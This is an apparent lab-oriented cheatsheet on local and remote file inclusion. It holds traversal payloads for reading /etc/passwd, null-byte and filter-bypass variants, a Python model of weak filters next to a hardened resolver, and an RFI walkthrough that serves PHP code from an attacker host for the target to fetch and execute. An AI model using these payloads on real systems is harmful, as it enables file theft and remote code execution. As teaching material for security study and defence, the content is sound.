File inclusion

See also the focused Path Traversal cheatsheet for bypass tricks (encoded, nested, null byte, base-dir-prefix) and LFI→RCE upgrades (PHP wrappers, log poisoning).

A file inclusion attack tricks a web application into including a file the developer never intended: either a sensitive file from the server's own filesystem, or a malicious file fetched from a remote host. The goal is to read data or run attacker-controlled code and use that foothold for further attacks.

There are two types of file inclusion: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI lets an attacker read unauthorized or sensitive files that already exist on the web server (and, when the included file is parsed as code, execute them), while RFI lets an attacker execute a malicious file hosted elsewhere by abusing the application's “include” functionality.

File inclusion vulnerabilities are prevented by never passing user input directly to file include functions: map the request parameter onto an allow list of known page names, anchor the result under a fixed base directory, and canonicalise the path (and reject NUL bytes) before it is used.

Path Traversal

Directory (path) traversal lets an attacker read files outside the intended directory and sometimes also execute commands on the target server. Targets include application code and data, credentials for back-end systems, and sensitive operating system files (or, in a lab, the flag).

http://webapp.thm/get.php?file=../../../../etc/passwd

Local File Inclusion (LFI)

Caused by programming mistakes and lack of awareness. PHP functions that introduce LFI when they receive unvalidated input: include(), include_once(), require() and require_once() (the included file is executed as PHP). fopen(), file_get_contents(), readfile() and file() can also disclose file contents, but do not execute them.

http://webapp.thm/get.php?file=/etc/passwd

Using Null byte

Null byte injection: in PHP versions before 5.3.4, a NUL byte (%00 in the URL) inside a path passed to PHP's filesystem functions truncated the path at that point, because the underlying C string handling treats NUL as the end of the string. Everything after it is ignored, so a suffix such as .php that the application appends is silently dropped. PHP 5.3.4 fixed this by rejecting paths that contain NUL bytes, so the trick only works against older PHP.

/lab3.php?file=../../../../../etc/passwd%00

Current directory trick

If a web application blocks the literal string /etc/passwd, an attacker can try to bypass the filter by appending /. to it, giving /etc/passwd/. This no longer matches the deny list, but it refers to the same file once the path is normalised before being opened, so the sensitive file is still read.

/lab4.php?file=../../../../etc/passwd/.

Bypassing filters

The application may remove the string ../ in a single, non-recursive pass. Doubling the sequence defeats this: after the inner ../ is removed from ....//, the leftover two dots and trailing slash form ../ again, so the traversal survives the filter.

....//....//....//....//etc/passwd/.
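The three bypasses above (null byte, /etc/passwd/., ....//) and the allow-list fix from the introduction, modelled in Python as an added example (this is not code from the page or from any real application). The weak filters are reconstructed from the descriptions; the base directory /var/www/html/pages and the page names are assumptions; posixpath.normpath stands in for a path resolver that collapses . and .. lexically before opening the file.

```python
"""Models of the weak path filters described above, the payloads that bypass
them, and a hardened resolver. Added example; not code from the page or from
any real application. Base directory and page names are assumed."""
import os
import posixpath

# ---------------------------------------------------------------------------
# Weak filters, each modelled after one trick on the page
# ---------------------------------------------------------------------------

def filter_append_ext(user_path):
    """The app forces a .php suffix so that only scripts can be included."""
    return user_path + ".php"

def php_pre_534_open_path(path):
    """What the filesystem call saw on PHP < 5.3.4: C string handling stops at
    the first NUL, so the forced suffix vanishes. PHP >= 5.3.4 rejects such
    paths instead; this function only models the old behaviour."""
    return path.split("\x00", 1)[0]

def filter_block_passwd(user_path):
    """Deny list that matches the exact string /etc/passwd."""
    if user_path.endswith("/etc/passwd"):
        raise PermissionError("blocked by deny list")
    return user_path

def filter_strip_dotdot(user_path):
    """Remove '../' in a single, non-recursive pass (str.replace does exactly
    one left-to-right sweep over the input)."""
    return user_path.replace("../", "")

def resolved(path, cwd="/var/www/html"):
    """Lexical model of a resolver that collapses '.' and '..' before opening
    (posixpath.normpath; touches no disk). Assumption: the target's include
    handling normalises this way, which is what makes '/etc/passwd/.'
    equivalent to '/etc/passwd'. cwd is an assumed web root."""
    return posixpath.normpath(posixpath.join(cwd, path))

# ---------------------------------------------------------------------------
# Hardened version: allow list + fixed base + canonical path check
# ---------------------------------------------------------------------------

PAGES_DIR = "/var/www/html/pages"             # assumed base directory
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed page names

def safe_page_path(user_value, base=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Return the only file this request may include, or raise ValueError.
    The allow list does the real work; the realpath/commonpath check is a
    second line of defence in case the allow list is ever loosened."""
    if "\x00" in user_value or user_value not in allowed:
        raise ValueError("rejected page name: %r" % (user_value,))
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_value + ".php"))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("path escapes base directory: %r" % (candidate,))
    return candidate

if __name__ == "__main__":
    # Null byte: the forced .php suffix is dropped on PHP < 5.3.4
    p = filter_append_ext("../../../../../etc/passwd\x00")
    print(repr(p), "->", php_pre_534_open_path(p))

    # Deny list on /etc/passwd: '/etc/passwd/.' slips past and resolves the same
    print(filter_block_passwd("../../../../etc/passwd/."), "->",
          resolved("../../../../etc/passwd/."))

    # Non-recursive '../' stripping: '....//' collapses back to '../'
    stripped = filter_strip_dotdot("....//....//....//....//etc/passwd/.")
    print(stripped, "->", resolved(stripped))

    # Hardened resolver accepts only allow-listed page names
    print(safe_page_path("home"))
    for bad in ("../../../../etc/passwd", "home\x00", "/etc/passwd/.", "....//home"):
        try:
            safe_page_path(bad)
        except ValueError as err:
            print("rejected:", err)
```

Run it directly to see each weak filter's output beside what the resolver would actually open. The hardened function deliberately checks the allow list before touching the filesystem, so a NUL byte or traversal sequence never reaches realpath(); the commonpath() comparison is kept as a belt-and-braces check rather than as the primary control.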

Other

Remote File Inclusion - RFI

Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remote file on a web server. This can happen when a web application uses user input to construct the path of a file to include without properly validating or sanitizing the input.

An attacker exploits this by supplying a URL as the parameter that points to a malicious file on a server they control. The web application fetches and includes that file and executes its contents, which can give the attacker code execution on the server. In PHP this only works when allow_url_include (and allow_url_fopen) is enabled in php.ini; allow_url_include has defaulted to Off since it was introduced in PHP 5.2, so RFI is far rarer than LFI on current deployments.

Demonstration

On the attacker machine, serve the current directory over HTTP (listens on port 8000 by default):

python3 -m http.server 8000

create a file, e.g. file.txt, containing the PHP code to be executed by the target

pass its URL as the vulnerable parameter: http://<ip>:<port>/file.txt